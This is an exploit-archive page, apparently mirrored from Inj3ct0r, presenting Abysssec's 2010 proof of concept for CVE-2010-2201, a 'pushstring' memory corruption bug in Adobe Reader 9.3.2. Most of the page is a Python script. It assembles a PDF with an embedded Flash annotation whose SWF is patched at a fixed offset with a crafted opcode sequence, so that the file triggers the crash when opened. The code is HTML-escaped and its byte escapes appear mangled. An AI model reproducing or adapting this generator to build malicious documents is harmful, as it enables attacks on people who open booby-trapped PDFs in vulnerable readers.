Home / os / win7

[local exploits] - Adobe Acrobat and Reader "pushstring

Posted on 11 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Adobe Acrobat and Reader &quot;pushstring&quot; Memory Corruption | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=======================================================
Adobe Acrobat and Reader &quot;pushstring&quot; Memory Corruption
=======================================================

  Title             :  Adobe Acrobat and Reader &quot;pushstring&quot; Memory Corruption
  Version           :  Adobe Reader 9.3.2
  Analysis         :  http://www.abysssec.com
  Vendor            :  http://www.adobe.com
  Impact            :  Med/High
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-2201
  MOAUB Number      :  MOAUB-10
&#039;&#039;&#039;
 
import sys
 
class PDF:
      
    def __init__(self):
        self.xrefs = []
        self.eol = &#039;x0a&#039;
        self.content = &#039;&#039;
        self.xrefs_offset = 0
         
    def header(self):
        self.content += &#039;%PDF-1.6&#039; + self.eol
         
    def obj(self, obj_num, data,flag):
        self.xrefs.append(len(self.content))
        self.content += &#039;%d 0 obj&#039; % obj_num
        if flag == 1:
            self.content += self.eol + &#039;&lt;&lt; &#039; + data + &#039; &gt;&gt;&#039; + self.eol
        else:
            self.content += self.eol + data + self.eol
        self.content += &#039;endobj&#039; + self.eol
 
    def obj_SWFStream(self, obj_num, data, stream):
        self.xrefs.append(len(self.content))
        self.content += &#039;%d 0 obj&#039; % obj_num
        self.content += self.eol + &#039;&lt;&lt; &#039; + data + &#039;/Params &lt;&lt; /Size %d &gt;&gt; /DL %d /Length %d&#039; %(len(stream),len(stream),len(stream))
        self.content += &#039; &gt;&gt;&#039; + self.eol
        self.content += &#039;stream&#039; + self.eol + stream + self.eol + &#039;endstream&#039; + self.eol
        self.content += &#039;endobj&#039; + self.eol
     
    def obj_Stream(self, obj_num, data, stream):
        self.xrefs.append(len(self.content))
        self.content += &#039;%d 0 obj&#039; % obj_num
        self.content += self.eol + &#039;&lt;&lt; &#039; + data + &#039;/Length %d&#039; %len(stream)
        self.content += &#039; &gt;&gt;&#039; + self.eol
        self.content += &#039;stream&#039; + self.eol + stream + self.eol + &#039;endstream&#039; + self.eol
        self.content += &#039;endobj&#039; + self.eol
         
    def ref(self, ref_num):
        return &#039;%d 0 R&#039; % ref_num
         
    def xref(self):
        self.xrefs_offset = len(self.content)
        self.content += &#039;xref&#039; + self.eol
        self.content += &#039;0 %d&#039; % (len(self.xrefs) + 1)
        self.content += self.eol
        self.content += &#039;0000000000 65535 f&#039; + self.eol
        for i in self.xrefs:
            self.content += &#039;%010d 00000 n&#039; % i
            self.content += self.eol
     
    def trailer(self):
        self.content += &#039;trailer&#039; + self.eol
        self.content += &#039;&lt;&lt; /Size %d&#039; % (len(self.xrefs) + 1)
        self.content += &#039; /Root &#039; + self.ref(1) + &#039; &gt;&gt; &#039; + self.eol
        self.content += &#039;startxref&#039; + self.eol
        self.content += &#039;%d&#039; % self.xrefs_offset
        self.content += self.eol
        self.content += &#039;%%EOF&#039;
         
    def generate(self):
        return self.content
 
 
         
         
class POC:
 
    def getSWF(self):
        try:
            fdR = open(&#039;flash.swf&#039;, &#039;rb+&#039;)
            strTotal = fdR.read()      
            str1 = strTotal[:479]
             
            command = &#039;x2CxE8x88xF0xFFx33&#039;   #pushstring
             
            str2 = strTotal[485:]
             
            fdW= open(&#039;poc.swf&#039;, &#039;wb+&#039;)
            finalStr = str1+command+str2
            fdW.write(finalStr)
             
            fdR.close()
            return finalStr
             
        except IOError:
            print &#039;[*] Error : An IO error has occurred&#039;
         
 
def generate_pdf():
    poc = POC()
    swfFile = &#039;poc.swf&#039;
    pdf = PDF()
    pdf.header()
    pdf.obj(1, &#039;/MarkInfo&lt;&lt;/Marked true&gt;&gt;/Type /Catalog/Pages &#039; + pdf.ref(2) ,1)
    pdf.obj(2, &#039;/Count 1/Type/Pages/Kids[ &#039;+pdf.ref(3)+&#039; ]&#039;,1)
    pdf.obj(3, &#039;/Annots [ &#039;+pdf.ref(5) +&#039; ]/Parent &#039;+pdf.ref(2) + &quot; /Type/Page&quot;+&#039; /Contents &#039;+pdf.ref(4) ,1)
    pdf.obj_Stream(4, &#039;&#039;,&#039;&#039;)
    pdf.obj(5, &#039;/RichMediaSettings &#039;+pdf.ref(6)+&#039; /NM ( &#039; + swfFile + &#039; ) /Subtype /RichMedia /Type /Annot /RichMediaContent &#039;+pdf.ref(7)+&#039; /Rect [ 266 116 430 204 ]&#039;,1)
    pdf.obj(6, &#039;/Subtype /Flash /Activation &#039;+pdf.ref(8)+&#039; /Type /RichMediaSettings /Deactivation &#039;+pdf.ref(9),1) 
    pdf.obj(7, &#039;/Type /RichMediaContent /Assets &#039;+pdf.ref(10) +&#039; /Configurations [ &#039; + pdf.ref(11) + &#039;]&#039;,1)
    pdf.obj(8, &#039;/Type /RichMediaActivation /Condition /PO &#039;,1) 
    pdf.obj(9, &#039;/Type /RichMediaDeactivation /Condition /XD &#039;,1)   
    pdf.obj(10, &#039;/Names [(&#039;+ swfFile +&#039;) &#039; + pdf.ref(12)+&#039; ]&#039;,1)   
    pdf.obj(11, &#039;/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ &#039;+pdf.ref(13) +&#039; ]&#039;,1) 
    pdf.obj(12, &#039;/EF &lt;&lt;/F &#039;+pdf.ref(14) +&#039; &gt;&gt; /Type /Filespec /F (&#039;+ swfFile +&#039;)&#039;,1)   
    pdf.obj(13, &#039;/Subype /Flash /Params &#039;+pdf.ref(15) +&#039; /Type /RichMediaInstance /Asset &#039;+ pdf.ref(12) ,1)
    pdf.obj_SWFStream(14, &#039; /Type /EmbeddedFile  &#039;,poc.getSWF() ) 
    pdf.obj(15, &#039;/Binding /Background /Type /RichMediaParams /FlashVars () /Settings &#039;+pdf.ref(16),1)
    pdf.obj_Stream(16, &#039;&lt;&lt;/Length 0 &gt;&gt; &#039;,&#039;&#039;) 
     
     
    pdf.xref()
    pdf.trailer()
    return pdf.generate()
     
def main():
    if len(sys.argv) != 2:
        print &#039;Usage: python %s [output file name]&#039; % sys.argv[0]
        sys.exit(0)
    file_name = sys.argv[1]
    if not file_name.endswith(&#039;.pdf&#039;):
        file_name = file_name + &#039;.pdf&#039;
    try:
        fd = open(file_name, &#039;wb+&#039;)
        fd.write(generate_pdf())
        fd.close()
        print &#039;[-] PDF file generated and written to %s&#039; % file_name
    except IOError:
        print &#039;[*] Error : An IO error has occurred&#039;
        print &#039;[-] Exiting ...&#039;
        sys.exit(-1)
if __name__ == &#039;__main__&#039;:
    main()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre></body></html>

 

TOP